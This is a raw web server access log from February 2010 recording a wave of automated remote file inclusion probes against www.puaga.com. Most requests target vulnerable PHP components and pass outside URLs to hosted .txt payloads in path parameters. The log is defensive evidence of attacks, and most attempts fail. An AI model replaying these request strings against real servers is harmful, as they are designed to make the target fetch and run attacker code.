110.45.146.189 - - [12/Feb/2010:08:06:54 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:06:57 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:07:00 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:08:07:25 -0800] "GET /logs/access_100108.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:08:07:30 -0800] "GET /logs/access_100111.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:08:07:35 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:08:07:35 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:08:07:35 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:08:07:37 -0800] "GET /logs/access_100125.log/akocomments.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:08:08:53 -0800] "GET /components/com_hashcash/server.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:08:08:53 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:08:08:54 -0800] "GET /logs/access_100112.log//components/com_hashcash/server.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:09:15 -0800] "GET /?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:09:15 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:09:20 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:09:33 -0800] "GET /logs/access_100202.log///bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:09:33 -0800] "GET /logs/access_100129.log///bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:09:34 -0800] "GET //bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:09:34 -0800] "GET /logs///bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:10:03 -0800] "GET /logs///bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:10:03 -0800] "GET /logs/access_100202.log///bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:10:04 -0800] "GET //bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:10:04 -0800] "GET /logs/access_100129.log///bbs//////delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:10:12 -0800] "GET /atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:10:12 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:10:13 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:10:22 -0800] "GET /logs//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:08:10:27 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:10:29 -0800] "GET /atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:10:30 -0800] "GET /logs//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:08:10:31 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:10:35 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:10:56 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:10:56 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:10:58 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:11:09 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:11:09 -0800] "GET /logs//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:29 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:29 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:29 -0800] "GET /logs//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:29 -0800] "GET /atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:29 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:30 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:30 -0800] "GET /atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:30 -0800] "GET /logs//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:41 -0800] "GET /atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:41 -0800] "GET /logs//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:41 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:11:41 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:11:46 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:11:47 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:11:47 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:12:00 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:08:12:04 -0800] "GET /logs//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [12/Feb/2010:08:12:19 -0800] "GET /?path=http://lembu2.50webs.com/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [12/Feb/2010:08:12:19 -0800] "GET /logs/?path=http://lembu2.50webs.com/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:13:18 -0800] "GET /logs/access_100105.log//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:13:18 -0800] "GET /logs/access_100117.log//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [12/Feb/2010:08:13:29 -0800] "GET /logs/access_100105.log/?path=http://lembu2.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:13:57 -0800] "GET /logs/access_100105.log//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:13:57 -0800] "GET /logs/access_100117.log//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:13:58 -0800] "GET /logs/access_100105.log//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:08:13:58 -0800] "GET /logs/access_100117.log//atom.php5?page=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:14:07 -0800] "GET /atom.php5?page=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:14:07 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:14:07 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.109.186 - - [12/Feb/2010:08:14:08 -0800] "GET /logs/surveys/survey.inc.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.109.186 - - [12/Feb/2010:08:14:08 -0800] "GET /surveys/survey.inc.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.109.186 - - [12/Feb/2010:08:14:08 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:14:10 -0800] "GET /logs//atom.php5?page=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [12/Feb/2010:08:14:11 -0800] "GET /logs/access_100107.log/?path=http://lembu2.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [12/Feb/2010:08:14:11 -0800] "GET /logs/?path=http://lembu2.50webs.com/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [12/Feb/2010:08:14:11 -0800] "GET /?path=http://lembu2.50webs.com/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:08:15:01 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:08:15:01 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
61.111.3.35 - - [12/Feb/2010:08:15:33 -0800] "GET /logs/access_100105.log/?path=http://lembu2.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:15:48 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:15:48 -0800] "GET /atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:15:48 -0800] "GET /logs//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:15:55 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:16:04 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:16:07 -0800] "GET /atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:16:07 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:16:07 -0800] "GET /logs//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:16:26 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:17:06 -0800] "GET /logs/access_100117.log//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:17:06 -0800] "GET /logs/access_100105.log//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:17:24 -0800] "GET /logs/access_100105.log//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:17:24 -0800] "GET /logs/access_100117.log//atom.php5?page=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:08:19:46 -0800] "GET /components/com_hashcash/server.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:08:19:46 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:08:19:46 -0800] "GET /logs/access_100112.log%20%20//components/com_hashcash/server.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.109.186 - - [12/Feb/2010:08:20:06 -0800] "GET /logs/access_100201.log%20%20/surveys/survey.inc.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:08:21:04 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:08:21:04 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:08:21:22 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:08:21:22 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:08:21:22 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:08:21:22 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:08:21:38 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:08:22:04 -0800] "GET /logs/access_100122.log%20%20//components/com_hashcash/server.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:08:22:07 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:08:22:07 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:23:01 -0800] "GET /logs/access_100118.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:23:02 -0800] "GET /logs//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:23:02 -0800] "GET /bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:23:03 -0800] "GET /logs/access_100111.log%20%20//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.173 - - [12/Feb/2010:08:23:31 -0800] "GET / HTTP/1.0" 200 2376 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.pixero.net"
218.38.136.125 - - [12/Feb/2010:08:23:43 -0800] "GET //bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:08:23:43 -0800] "GET /logs///bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:08:23:43 -0800] "GET /logs/access_100126.log%20%20///bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:23:57 -0800] "GET /logs/access_100104.log%20%20//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:24:02 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:24:47 -0800] "GET /logs/access_100103.log%20%20/htmltonuke.php?filnavn=http://210.116.103.118/~kardex/RosebanditZ/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:24:47 -0800] "GET /logs/htmltonuke.php?filnavn=http://210.116.103.118/~kardex/RosebanditZ/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:24:47 -0800] "GET /htmltonuke.php?filnavn=http://210.116.103.118/~kardex/RosebanditZ/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:24:48 -0800] "GET /logs/access_100122.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:25:03 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:25:03 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
